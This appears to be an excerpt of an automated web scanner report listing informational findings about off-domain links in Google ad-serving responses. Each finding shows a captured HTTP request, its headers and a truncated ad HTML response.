GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303634521&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F23%2Fdork%2Fnextadvisorcom%2Freflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.html&dt=1303616551239&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303616551462&frm=0&adk=1607234649&ga_vid=1752949238.1303616552&ga_sid=1303616552&ga_hid=1192729809&ga_fc=0&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=783&xpc=7zsW6P0jZh&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 03:51:47 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13593

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/23/dork/nextadvisorcom/reflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhoenix.edu%26adT%3DUniversity%2Bof%2BPhoenix%25C2%25AE%26adU%3DCampusCorner.com/Security%26adT%3DSecurity%2BGuard%2BSchools%26adU%3Dwww.tftus.com%26adT%3DQA%2B%2526amp%253B%2BTesting%2BServices%26gl%3DUS&amp;usg=AFQjCNHLZNMmMjU-c1A29DkBR9Q0wRPxaw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.293. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303679522&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Freflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-trustedidcom.html&dt=1303661739024&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303661739033&frm=0&adk=1607234649&ga_vid=1819488597.1303661739&ga_sid=1303661739&ga_hid=1507832844&ga_fc=0&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&eid=33895130&fu=0&ifi=1&dtd=15&xpc=LXtROkeFbo&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-trustedidcom.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:15:36 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13247

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-trustedidcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.protegrity.com%26adT%3DSecure%2BSensitive%2BData%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BNetwork%2BSecurity%26gl%3DUS&amp;usg=AFQjCNEgDd4BYYILTEgm0CahPno80MiIBA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.294. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680083&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662083051&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662083064&frm=1&adk=2614322350&ga_vid=1007750320.1303662083&ga_sid=1303662083&ga_hid=349962597&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=15 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:21:20 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14530

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3Dwww.GoECart.com/Sell_More%26adT%3DEasier%2BAmazon%2BStore%2BMgmt.%26adU%3DMatureSinglesOnly.com/Video%26adT%3DSingle%2Band%2BOver%2B40%253F%26adU%3DNasuni.com/Cloud_Providers%26adT%3DConnect%2Bw/Cloud%2BProviders%26gl%3DUS&amp;usg=AFQjCNFcVLyQ2z7-W1WB5Mux_aphiXp-vA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.295. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681216&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663216339&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303663216349&frm=1&adk=2614322350&ga_vid=1615909729.1303663216&ga_sid=1303663216&ga_hid=92707091&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=13 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:40:13 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15247

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BServer%2BSolutions%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dtripplite.com/RackSolutions%26adT%3DOpen%2BFrame%2BRacks%26adU%3DPeru.travel%26adT%3DVisiting%2BAmazonia%253F%26gl%3DUS&amp;usg=AFQjCNFDpg4cEKV_oikZDc4yGQWtj65DAg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.296. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680267&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662267450&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662267455&frm=1&adk=2614322350&ga_vid=1394684814.1303662267&ga_sid=1303662267&ga_hid=102765395&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:24:24 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14725

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3Dwww.proaudiostash.com%26adT%3D19%2526quot%253B%2BLaptop%2BDrawer%26adU%3Dentertainmentmetals.com%26adT%3DEntertainment%2BMetals%2BInc.%26gl%3DUS&amp;usg=AFQjCNFdtyIz5vNZYDlvLlZNFI0y53ThDQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.297. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676535&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658535577&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658535589&frm=1&adk=2614322350&ga_vid=264078897.1303658536&ga_sid=1303658536&ga_hid=1040660802&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=15 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:22:12 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4319

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keyword%25257D%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dealfind.com/Chicago%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEd9HA2nxrkLbbvBKRSujZaBPFXYg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.298. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680615&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662615050&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303662615052&frm=1&adk=2614322350&ga_vid=397039040.1303662615&ga_sid=1303662615&ga_hid=305663549&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=4 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:30:12 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2240

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
rWFooeVRDX2hNa3k1OVhRTUx1SHhHTHpnTWxqNjREUWJPdUFtMk1sQmYwWYABq5_1pQ-oAaazB7ABAQ;redirect=http%3A%2F%2Fwww.regonline.com%2F%3Futm_source%3Dquantcast%26utm_medium%3Ddisplay%26utm_campaign%3DQC_201104v1"><img src="http://content.quantserve.com/ads/regonline/Regonline_Q2-11.20110419.160x600.gif" style="border-style: none"/></A><img src="http://exch.quantserve.com/pixel/p-b7FzQys84a9fI.gif?media=ad&p=TbRQFAABy98K7F60sjwLHjvRFLD0--AOrcithw&r=1412591714&rand=12093&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=2&rtbip=63.251.90.142&rtbdata2=EAAaD1JlZ29ubGluZV9RMi0xMSDQCyiEGTD-3B46M2h0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocEIHCK_GBxD1AUoHCP66BhDrWFooeVRDX2hNa3k1OVhRTUx1SHhHTHpnTWxqNjREUWJPdUFtMk1sQmYwWYABq5_1pQ-oAaazB7ABAQ" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></body>
...[SNIP]...

23.299. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676420&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658420036&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658420051&frm=1&adk=2614322350&ga_vid=1350158520.1303658420&ga_sid=1303658420&ga_hid=1723873345&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=18 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:20:17 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1371

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="160" height="600" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkJ8R0ZCT2liWFhBY3wxMzAzNjU4NDE5MTY5fDF8MEZ3bmdyZnBiQXwwUk5ZbmtnMkVNfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7yIK5YEMImIa-_oXlc_g9IF-8zhv8w&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJOWW5rZzJFTQ&reqid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&"> </iframe>
...[SNIP]...

23.300. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676544&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658544577&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658544581&frm=1&adk=2614322350&ga_vid=1063735003.1303658545&ga_sid=1303658545&ga_hid=467631587&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895132&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:22:21 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1369

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
